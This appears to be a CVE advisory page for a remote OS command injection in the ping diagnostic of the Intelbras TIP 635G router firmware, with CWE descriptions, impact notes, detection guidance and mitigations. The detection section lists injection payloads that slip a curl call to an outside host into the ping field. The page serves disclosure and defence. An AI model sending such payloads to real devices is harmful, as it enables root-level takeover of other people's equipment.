CVE-2026-3101
Received Received - Intake
Remote OS Command Injection in Intelbras TIP 635G Ping Handler

Publication date: 2026-02-24

Last updated on: 2026-04-29

Assigner: VulDB

Description
A vulnerability was found in Intelbras TIP 635G 1.12.3.5. This vulnerability affects unknown code of the component Ping Handler. The manipulation results in os command injection. The attack can be executed remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way.
CVSS Scores
EPSS Scores
Probability:
Percentile:
Meta Information
Published
2026-02-24
Last Modified
2026-04-29
Generated
2026-06-16
AI Q&A
2026-02-24
EPSS Evaluated
2026-06-14
NVD
CVE-2026-3101
EUVD
EUVD-2026-8470
Affected Vendors & Products
Showing 1 associated CPE
Vendor Product Version / Range
intelbras tip_635g_firmware 1.12.3.5
Helpful Resources
Exploitability
CWE
CWE Icon
KEV
KEV Icon
CWE ID Description
CWE-77 The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component.
CWE-78 The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component.
Attack-Flow Graph
AI Quick Actions
Instant insights powered by AI
Executive Summary

CVE-2026-3101 is an OS command injection vulnerability found in the Intelbras TIP 635G version 1.12.3.5, specifically in the Ping Handler component of its web management interface.

The vulnerability occurs because the diagnostic ping feature does not properly sanitize user input and directly incorporates it into system shell commands. This allows an attacker to inject arbitrary OS commands using shell command substitution syntax.

Exploitation can be done remotely and, depending on the source, may require authentication or not. Successful exploitation leads to remote code execution with root-level privileges, enabling complete device compromise.

Impact Analysis

This vulnerability can have severe impacts including complete compromise of the affected device.

  • Remote attackers can execute arbitrary OS commands with root privileges.
  • Attackers can gain full control over the device, potentially allowing lateral movement within the network.
  • Confidentiality, integrity, and availability of the system can be compromised.
  • Since the exploit is publicly available and no vendor mitigation exists, the risk of exploitation is high.
Compliance Impact

I don't know

Detection Guidance

[{'type': 'paragraph', 'content': 'The vulnerability can be detected by testing the diagnostic "ping" feature of the Intelbras TIP 635G version 1.12.3.5 web management interface for OS command injection. Since the injected command output is not displayed in the web interface, detection relies on observing out-of-band effects such as network requests initiated by the compromised device.'}, {'type': 'paragraph', 'content': 'Specifically, an authenticated user can attempt to inject shell command substitution syntax (e.g., $(...)) into the ping input to see if arbitrary commands are executed.'}, {'type': 'paragraph', 'content': 'Example commands to test might include injecting payloads like: ping; curl http://yourserver.com or ping $(curl http://yourserver.com) to trigger outbound network requests that can be monitored externally.'}] [1]

Mitigation Strategies

[{'type': 'paragraph', 'content': 'Immediate mitigation steps are limited as no known countermeasures or patches exist from the vendor.'}, {'type': 'paragraph', 'content': "It is recommended to restrict access to the affected device's web management interface to trusted and authenticated users only."}, {'type': 'paragraph', 'content': 'Monitor network traffic for unusual outbound connections that could indicate exploitation attempts.'}, {'type': 'paragraph', 'content': 'Consider replacing the affected Intelbras TIP 635G device with a secure alternative to eliminate the risk.'}] [2]

Chat Assistant
Ask questions about this CVE
Hi! I’m here to help you understand CVE-2026-3101. Ask me anything about the vulnerability, its impact, or mitigation strategies.
0/70
EPSS Chart